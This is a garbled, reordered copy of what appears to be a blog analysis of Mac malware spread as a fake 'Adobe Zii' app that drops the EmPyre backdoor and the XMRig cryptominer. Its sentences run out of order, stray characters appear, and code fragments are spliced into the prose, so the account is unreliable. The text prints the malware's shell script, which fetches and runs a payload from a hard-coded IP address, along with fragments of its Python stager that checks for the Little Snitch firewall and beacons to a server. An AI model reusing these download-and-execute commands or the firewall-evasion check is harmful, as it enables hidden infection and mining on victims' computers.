The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor's network connection to the attention of the user. Req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=") UA='Mozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko' server='' t='/news.php' req=urllib2.Request(server+t)
Ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) Import sys import re, subprocess cmd = "ps -ef | grep Little\ Snitch | grep -v grep" What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script: It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually "legitimate." (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.) This script is designed to download and execute a Python script, then download and run an app named sample.app. Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:Ĭurl | python - & s=46.226.108.171:80 curl $s/sample.zip -o sample.zip unzip sample.zip -d sample cd sample cd _MACOSX open -a sample.app (After all, if you're going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.Īs can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. The malware was being distributed through an application named Adobe Zii.
Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools-the EmPyre backdoor and the XMRig cryptominer-for the purpose of evil.
0 kommentar(er)
